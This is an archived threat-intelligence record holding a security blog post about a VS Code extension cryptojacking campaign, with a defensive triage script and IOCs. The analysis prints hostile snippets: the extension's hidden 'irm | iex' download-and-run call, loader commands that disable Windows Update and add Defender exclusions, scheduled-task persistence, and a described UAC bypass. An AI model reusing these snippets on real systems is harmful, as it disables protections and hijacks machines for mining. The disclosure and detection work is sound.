{
	"id": "0fcb3942-1561-4538-b5de-270f19f4d93a",
	"created_at": "2026-04-06T00:06:51.299981Z",
	"updated_at": "2026-04-10T13:13:04.022843Z",
	"deleted_at": null,
	"sha1_hash": "4d58143f6caf820377ad38281570c5353a26a142",
	"title": "Mining in Plain Sight: The VS Code Extension Cryptojacking Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2065575,
	"plain_text": "Mining in Plain Sight: The VS Code Extension Cryptojacking\r\nCampaign\r\nBy Yuval Ronen,,\r\nArchived: 2026-04-05 17:01:30 UTC\r\nDevelopers targeted by sophisticated cryptomining campaign hiding in seemingly legitimate VS Code extensions,\r\npotentially reaching over one million installations as detected by ExtensionTotal.\r\nThese fake extensions, published after April 4th by three different authors (mostly “Mark H”), secretly download a\r\nPowerShell script that disables Windows security, establishes persistence through scheduled tasks, and installs an\r\nXMRig cryptominer. The most successful fake extension (“Discord Rich Presence”) gained 189K installs alone.\r\nThe attackers created a sophisticated multi-stage attack, even installing the legitimate extensions they\r\nimpersonated to avoid raising suspicion while mining cryptocurrency in the background.\r\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nPage 1 of 6\n\nIntroduction\r\nOver the weekend, ten malicious Visual Studio Code extensions were published by three different authors, serving\r\nas the initial access vector in a sophisticated multi-stage cryptomining campaign.\r\nThese extensions masqueraded as popular development tools, with accumulating over one million installs. 
Once installed, they download and execute a PowerShell loader that disables the Windows Update services, adds Defender exclusions, and ultimately deploys the XMRig cryptominer fetched from a remote C2 server.\r\nhttps://app.extensiontotal.com/report/markh.discord-rich-presence-vs\r\n\r\nAnatomy of the Malicious Extension Campaign\r\nThe campaign published ten different Visual Studio Code extensions:\nPrettier — Code for VSCode (by prettier) - 955K Installs\nDiscord Rich Presence for VS Code (by Mark H) - 189K Installs\nRojo — Roblox Studio Sync (by evaera) - 117K Installs\nSolidity Compiler (by VSCode Developer) - 1.3K Installs\nClaude AI (by Mark H)\nGolang Compiler (by Mark H)\nChatGPT Agent for VSCode (by Mark H)\nHTML Obfuscator (by Mark H)\nPython Obfuscator for VSCode (by Mark H)\nRust Compiler for VSCode (by Mark H)\nThe three most popular extensions in the campaign, showing 955K, 189K and 117K installs respectively, reached these numbers in an unusually short period of time. 
This strongly suggests that the install counts were artificially inflated, likely to establish credibility and reduce user suspicion by making the extensions appear widely trusted and actively used.\nAll of the extensions operate the same way. First, they download and execute a PowerShell script from the same C2 server at https://asdf11[.]xyz/ in a hidden window. They then attempt to install the legitimate extension they impersonate, so that users still get the expected functionality and are less likely to suspect malicious behavior.\nThe relevant part of the extension code is shown below. The helper functions executeCmdCommand and installExtension are not shown, and the URL passed to irm is omitted. Note that the comments still refer to the Solidity variant while the extension actually installed is the Discord one (icrawl.discord-vscode), consistent with the same code being copied between the ten extensions.\n\nconst vscode = require('vscode');\n\nfunction activate(context) {\n  // Register the command to execute the PowerShell Loader and install the extension\n  let disposable = vscode.commands.registerCommand('hubtestmanagerex.runCmd', async function () {\n    if (process.platform === 'win32') {\n      const cmdCommand = 'powershell -Command \"irm | iex\"';\n      try {\n        // Execute the command to download and execute the PowerShell Loader\n        await executeCmdCommand(cmdCommand);\n        // After the PowerShell Loader has been executed, install the Solidity extension\n        const extensionId = 'icrawl.discord-vscode'; // The identifier for the Solidity extension\n        await installExtension(extensionId);\n      } catch (error) {\n        vscode.window.showErrorMessage(`Failed to execute command: ${error.message}`);\n      }\n    }\n  });\n  context.subscriptions.push(disposable); // standard VS Code boilerplate, cut off in the excerpt\n}\n\nThe C2 domain asdf11[.]xyz was created recently, on the same day the first extensions were published: April 4, 2025.\n\nAlthough the extensions were published under different author names, they share identical code and communicate with the same C2 server to download and execute the same payload.\r\nMalicious behavior from extension’s report on ExtensionTotal\r\n\r\nPowerShell Loader\r\nThe PowerShell script is responsible for persistence, defense evasion, privilege escalation and execution.\r\nPersistence mechanism\r\nSets up a scheduled task named 
“OnedriveStartup” to run at logon, masquerading as legitimate OneDrive software:\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c schtasks /create /tn `\"OnedriveStartup`\" /tr `\"$qZVhfWBWTd5ptqbWRS8gz\r\nStores the script in a registry value under HKCU\\\\Software\\\\Microsoft and runs it from there:\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c reg add \"\"HKCU\\\\Software\\\\Microsoft\"\" /v \"\"Version\"\" /t REG_SZ /d $uD\r\nDefense Evasion\r\nDisables the Windows Update services (wuauserv, WaaSMedicSvc and UsoSvc). With all three stopped and set to Disabled the host no longer receives updates, and because the Update Medic Service is among them, Windows cannot repair the other two on its own:\r\n# Stops the Windows Update Service and disables it from starting\r\nStop-Service -Name wuauserv -Force\r\nSet-Service -Name wuauserv -StartupType Disabled\r\n# Modifies registry to disable the Windows Update Medic Service\r\nStart-Process \"cmd.exe\" -ArgumentList '/c reg add \"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WaaSMedicSvc\" /v S\r\n# Stops and disables the Update Orchestrator Service\r\nStop-Service -Name UsoSvc -Force\r\nSet-Service -Name UsoSvc -StartupType Disabled\r\nAdds the directory it created to the Windows Defender exclusion list, both through Add-MpPreference and through the Defender policy key in HKLM (a policy exclusion stays in effect even if the preference is later removed):\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c powershell -Command \"\"Add-MpPreference -ExclusionPath '%localappdata%\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c reg add `\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclu\r\nPrivilege Escalation\r\nThe PowerShell script tries to run the malicious payload with Administrator permissions. If it does not have them, it creates a second, look-alike System32 directory, copies ComputerDefaults.exe into it, drops its own malicious DLL named MLANG.dll beside the copy, and runs that ComputerDefaults.exe. This is a DLL side-loading UAC bypass: ComputerDefaults.exe is an auto-elevating Windows binary, so when the copy loads the attacker’s MLANG.dll instead of the genuine one from the real System32, the DLL runs with elevated privileges and no consent prompt.\r\nExecution\r\nThe PowerShell script contains the DLLs and the Trojan executable as plain base64-encoded strings. 
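The persistence, defense-evasion and privilege-escalation artifacts described above are all things a responder can check for on a host. The triage script below is an added example, not code from the ExtensionTotal post: the task name, registry value, service names, exclusion locations, file names, hashes and C2 domains come from the post, while the decision to search the whole system drive for a stray MLANG.dll and only LOCALAPPDATA for the dropped executables is an assumption about where the loader writes, since the post cuts off both paths.

```powershell
# Added example (not from the ExtensionTotal post): triage a Windows host for the
# artifacts the PowerShell loader leaves behind. Names and hashes are from the
# post; the search locations marked below are assumptions.
$IocHashes = @{
    '2d17f0cb6c8d9488f2d101b90052692049b0c4bd9bf4949758aae7b1fd936191' = 'Launcher.exe / myau.exe'
    'd2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1' = 'xmrig.exe'
    '13db408a3232ea31aab8edc648b6c315782db9516e1c08c6bd667e17f5dd147c' = 'DLL'
    '515e6d58b720d5e125602621b28fa37a669efed508e983b8c3136bea80d46640' = 'DLL'
}
$C2Domains = 'asdf11.xyz', 'myaunet.su'

function Test-LoaderArtifact {
    $findings = [System.Collections.Generic.List[string]]::new()

    # Persistence: the logon task named after OneDrive, and the script body the
    # loader stores in HKCU\\Software\\Microsoft\\Version (reported for inspection).
    $task = Get-ScheduledTask -TaskName 'OnedriveStartup' -ErrorAction SilentlyContinue
    if ($task) {
        $actions = ($task.Actions | ForEach-Object { '{0} {1}' -f $_.Execute, $_.Arguments }) -join '; '
        $findings.Add('Scheduled task OnedriveStartup: ' + $actions)
    }
    $ver = Get-ItemProperty -Path 'HKCU:\\Software\\Microsoft' -Name 'Version' -ErrorAction SilentlyContinue
    if ($ver -and $ver.Version) {
        $findings.Add(('HKCU\\Software\\Microsoft\\Version holds {0} characters of data' -f ([string]$ver.Version).Length))
    }

    # Defense evasion: update services forced to Disabled (Start = 4). Read the
    # registry rather than Get-Service so the protected WaaSMedicSvc is covered too.
    foreach ($svc in 'wuauserv', 'WaaSMedicSvc', 'UsoSvc') {
        $key = 'HKLM:\\SYSTEM\\CurrentControlSet\\Services\\' + $svc
        $start = (Get-ItemProperty -Path $key -Name 'Start' -ErrorAction SilentlyContinue).Start
        if ($start -eq 4) { $findings.Add('Service disabled: ' + $svc) }
    }

    # Defense evasion: Defender exclusions, both the live preference and the policy
    # key the loader also writes (policy exclusions apply even if the preference is cleared).
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -and ($p -like '%localappdata%*' -or $p.StartsWith($env:LOCALAPPDATA, 'OrdinalIgnoreCase'))) {
            $findings.Add('Defender exclusion under LOCALAPPDATA: ' + $p)
        }
    }
    $policy = 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths'
    if (Test-Path -LiteralPath $policy) {
        foreach ($name in (Get-Item -LiteralPath $policy).Property) { $findings.Add('Defender policy exclusion: ' + $name) }
    }

    # Privilege escalation: MLANG.dll anywhere outside the real Windows directory
    # (the genuine copies live under System32, SysWOW64 and WinSxS). Searching the
    # whole system drive is an assumption; the post does not name the fake System32 path.
    $winRoot = $env:SystemRoot.TrimEnd('\\') + '\\'
    Get-ChildItem -Path ($env:SystemDrive + '\\') -Filter 'MLANG.dll' -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { -not $_.FullName.StartsWith($winRoot, 'OrdinalIgnoreCase') } |
        ForEach-Object {
            $sibling = Test-Path -LiteralPath (Join-Path $_.DirectoryName 'ComputerDefaults.exe')
            $findings.Add(('MLANG.dll outside Windows dir: {0} (ComputerDefaults.exe beside it: {1})' -f $_.FullName, $sibling))
        }

    # Execution: dropped binaries under LOCALAPPDATA, matched by SHA-256 against the
    # IOC list. The exact subdirectory is cut off in the post, hence the recursive search.
    Get-ChildItem -Path $env:LOCALAPPDATA -Include 'Launcher.exe', 'myau.exe', 'xmrig.exe' -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash.ToLowerInvariant()
            if ($IocHashes.ContainsKey($hash)) { $findings.Add(('IOC hash match ({0}): {1}' -f $IocHashes[$hash], $_.FullName)) }
            else { $findings.Add('Suspicious file name, hash not in IOC list: ' + $_.FullName) }
        }

    # Network: cached DNS answers for either C2 domain.
    foreach ($entry in @(Get-DnsClientCache -ErrorAction SilentlyContinue)) {
        if ($entry.Entry -in $C2Domains) { $findings.Add('DNS cache entry for C2: ' + $entry.Entry) }
    }

    return $findings
}

$result = @(Test-LoaderArtifact)
if ($result.Count -eq 0) { 'No loader artifacts found on ' + $env:COMPUTERNAME } else { $result }
```

Run it from an elevated PowerShell prompt so that scheduled tasks and the HKLM policy key are readable; the drive-wide search for MLANG.dll is the slow part and can take several minutes. A disabled wuauserv on its own may be an administrator's choice, so treat that line as corroboration rather than proof; the task name, the policy exclusion and a hash match are the strong signals. None of these checks require extracting the base64 payloads from the loader, which decodes them itself.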
It decodes the Trojan and writes it, as Launcher.exe, to the directory it created and excluded from Windows Defender. Launcher.exe then communicates with a second C2 server, myaunet[.]su, downloading and executing the XMRig tool used for mining Monero.\r\n\r\nConclusion\r\nThis campaign is yet another example of the growing sophistication and frequency of supply chain attacks within developer ecosystems. As marketplaces like the Visual Studio Code extension store continue to grow, so does their attractiveness as a vector for exploitation.\r\nAt ExtensionTotal, we help organizations navigate this evolving threat landscape by detecting malicious or risky extensions before they cause harm, allowing teams to continue leveraging the power and productivity of modern development tools without compromising on security.\r\n\r\nIOCs\r\nVS Code Package Names\r\nprettierteam.prettier\r\nmarkh.chatgpt-autocoder-vscode\r\nmarkh.claude-autocoder-vscode\r\nmarkh.discord-rich-presence-vs\r\nmarkh.golang-compiler-vscode\r\nmarkh.python-obfuscator-vscode\r\nmarkh.rust-compiler-vs\r\nevaera-rbx.vscode-rojo-rbx\r\nvscodedeveloper.sobidity-compiler\r\nFile Hashes (SHA-256)\r\n2d17f0cb6c8d9488f2d101b90052692049b0c4bd9bf4949758aae7b1fd936191 — Launcher.exe / myau.exe\r\nd2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1 — xmrig.exe\r\nbb757c6338491170072e8b743ea2758eebaeb1472ba6b421c950c79a3daed853 — PowerShell\r\n26111b28f6c507ea68e7c8a0f3ad64fb0d7b694d7f703bc626d871c4e1502dc2 — PowerShell\r\n0c05365ea9c1162b10d93ffdc93eb4207b61062d35dbf6d424ad15e3342ecb70 — PowerShell\r\nb98dfc7ed18d6d30490fc2b997fbeae36541335bd05a94624da8b808e818d094 — PowerShell\r\n71b48bc26f4a4f9759eaf35f44e7cebf4f18e1a74ab2c902f91404ca8ceb3a4e — PowerShell\r\n13db408a3232ea31aab8edc648b6c315782db9516e1c08c6bd667e17f5dd147c — 
DLL\r\n515e6d58b720d5e125602621b28fa37a669efed508e983b8c3136bea80d46640 — DLL\r\nC2 Servers\r\nasdf11[.]xyz\r\nmyaunet[.]su\r\nSource: https://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59"
	],
	"report_names": [
		"mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59"
	],
	"threat_actors": [],
	"ts_created_at": 1775434011,
	"ts_updated_at": 1775826784,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d58143f6caf820377ad38281570c5353a26a142.pdf",
		"text": "https://archive.orkl.eu/4d58143f6caf820377ad38281570c5353a26a142.txt",
		"img": "https://archive.orkl.eu/4d58143f6caf820377ad38281570c5353a26a142.jpg"
	}
}